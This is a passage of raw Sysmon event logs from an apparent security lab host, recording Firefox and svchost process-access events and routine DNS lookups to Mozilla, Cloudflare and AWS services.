Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.043{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2ba9421|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a 10341000x800000000000000016859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.043{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+2ba9393|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.043{59A5CD1D-945A-6005-3305-00000000A301}70524608C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+f7b5aa|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+e485|C:\Program Files\Mozilla Firefox\xul.dll+f532a1|C:\Program Files\Mozilla Firefox\xul.dll+e1b5|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+c0a4|C:\Program Files\Mozilla Firefox\xul.dll+f53f81|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:58.038{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.038{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:58.038{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.038{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.037{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program 
Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.037{59A5CD1D-945A-6005-3305-00000000A301}70526964C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Program Files\Mozilla Firefox\firefox.exe+50312|C:\Program Files\Mozilla Firefox\firefox.exe+2d163|C:\Program Files\Mozilla Firefox\xul.dll+9cb21b|C:\Program Files\Mozilla Firefox\xul.dll+f7278c|C:\Program Files\Mozilla Firefox\xul.dll+f70052|C:\Program Files\Mozilla Firefox\xul.dll+f7c85e|C:\Program Files\Mozilla Firefox\xul.dll+a81e44|C:\Program Files\Mozilla Firefox\xul.dll+3af91|C:\Program Files\Mozilla Firefox\xul.dll+39cbd|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.037{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe84.0.2FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7052.20.1983361949\806575280" -childID 3 -isForBrowser -prefsHandle 3744 -prefMapHandle 3720 -prefsLen 2089 -prefMapSize 229288 -parentBuildID 20210105180113 -appdir "C:\Program Files\Mozilla Firefox\browser" - 7052 
"\\.\pipe\gecko-crash-server-pipe.7052" 3752 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492LowMD5=6B3FC10BA1FB445C6772D076860B0F3B,SHA256=080A31499728B001B28FA8A386A73A800A190B91B129127E597D8E67549C1D86,IMPHASH=5ED80EE3BE69CAE0F2D23403B0DC50DC{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -first-startup 10341000x800000000000000016850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.037{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.880{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.770{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program 
Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a80098|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.770{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a80098|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program 
Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.770{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a80098|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:59.770{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a80098|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.280{59A5CD1D-8E56-6005-2E00-00000000A301}246434.183.230.54.in-addr.arpa.0type: 12 server-54-230-183-34.ham50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000017064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.276{59A5CD1D-8E56-6005-2E00-00000000A301}246435.194.224.13.in-addr.arpa.0type: 12 server-13-224-194-35.fra2.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000017063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:59.232{59A5CD1D-945A-6005-3305-00000000A301}7052firefox.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.229{59A5CD1D-945A-6005-3305-00000000A301}7052firefox.com044.236.72.93;44.235.246.155;44.236.48.31;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.229{59A5CD1D-945A-6005-3305-00000000A301}7052firefox.com0::ffff:44.236.48.31;::ffff:44.236.72.93;::ffff:44.235.246.155;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.183{59A5CD1D-945A-6005-3305-00000000A301}7052accounts.firefox.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.180{59A5CD1D-945A-6005-3305-00000000A301}7052accounts.firefox.com035.155.76.53;44.240.166.47;52.40.168.255;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.179{59A5CD1D-945A-6005-3305-00000000A301}7052accounts.firefox.com0::ffff:52.40.168.255;::ffff:35.155.76.53;::ffff:44.240.166.47;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.130{59A5CD1D-945A-6005-3305-00000000A301}7052pipeline-incoming-prod-elb-149169523.us-west-2.elb.amazonaws.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:59.128{59A5CD1D-945A-6005-3305-00000000A301}7052pipeline-incoming-prod-elb-149169523.us-west-2.elb.amazonaws.com044.240.93.245;52.34.114.142;52.35.6.89;52.35.83.137;52.39.144.189;54.191.136.131;35.161.157.118;44.239.250.14;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.127{59A5CD1D-945A-6005-3305-00000000A301}7052incoming.telemetry.mozilla.org0type: 5 telemetry-incoming.r53-2.services.mozilla.com;type: 5 pipeline-incoming-prod-elb-149169523.us-west-2.elb.amazonaws.com;::ffff:44.239.250.14;::ffff:44.240.93.245;::ffff:52.34.114.142;::ffff:52.35.6.89;::ffff:52.35.83.137;::ffff:52.39.144.189;::ffff:54.191.136.131;::ffff:35.161.157.118;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.935{59A5CD1D-945A-6005-3305-00000000A301}7052www.mozilla.org.cdn.cloudflare.net02606:4700::6812:a422;2606:4700::6812:a522;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.931{59A5CD1D-945A-6005-3305-00000000A301}7052ipv4only.arpa0::ffff:192.0.0.171;::ffff:192.0.0.170;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.930{59A5CD1D-945A-6005-3305-00000000A301}7052www.mozilla.org.cdn.cloudflare.net0104.18.164.34;104.18.165.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.929{59A5CD1D-945A-6005-3305-00000000A301}7052www.mozilla.org0type: 5 www.mozilla.org.cdn.cloudflare.net;::ffff:104.18.165.34;::ffff:104.18.164.34;C:\Program Files\Mozilla Firefox\firefox.exe 
22542200x800000000000000017050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.929{59A5CD1D-945A-6005-3305-00000000A301}7052example.org0::ffff:93.184.216.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.929{59A5CD1D-945A-6005-3305-00000000A301}7052example.org093.184.216.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.881{59A5CD1D-945A-6005-3305-00000000A301}7052prod.detectportal.prod.cloudops.mozgcp.net02600:1901:0:38d7::;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.879{59A5CD1D-945A-6005-3305-00000000A301}7052prod.detectportal.prod.cloudops.mozgcp.net034.107.221.82;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.878{59A5CD1D-945A-6005-3305-00000000A301}7052detectportal.firefox.com0type: 5 detectportal.prod.mozaws.net;type: 5 prod.detectportal.prod.cloudops.mozgcp.net;::ffff:34.107.221.82;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.254{59A5CD1D-8E56-6005-2E00-00000000A301}2464141.48.215.34.in-addr.arpa.0type: 12 ec2-34-215-48-141.us-west-2.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000017044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.253{59A5CD1D-8E56-6005-2E00-00000000A301}246419.194.224.13.in-addr.arpa.0type: 12 server-13-224-194-19.fra2.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000017043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:57.570{59A5CD1D-945A-6005-3305-00000000A301}7052cs9.wac.phicdn.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.568{59A5CD1D-945A-6005-3305-00000000A301}7052cs9.wac.phicdn.net093.184.220.29;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.567{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.digicert.com0type: 5 cs9.wac.phicdn.net;::ffff:93.184.220.29;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.560{59A5CD1D-945A-6005-3305-00000000A301}7052prod-classifyclient.normandy.prod.cloudops.mozgcp.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.559{59A5CD1D-945A-6005-3305-00000000A301}7052prod-classifyclient.normandy.prod.cloudops.mozgcp.net034.98.75.36;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.558{59A5CD1D-945A-6005-3305-00000000A301}7052classify-client.services.mozilla.com0type: 5 prod-classifyclient.normandy.prod.cloudops.mozgcp.net;::ffff:34.98.75.36;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.544{59A5CD1D-945A-6005-3305-00000000A301}7052normandy-cdn.services.mozilla.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 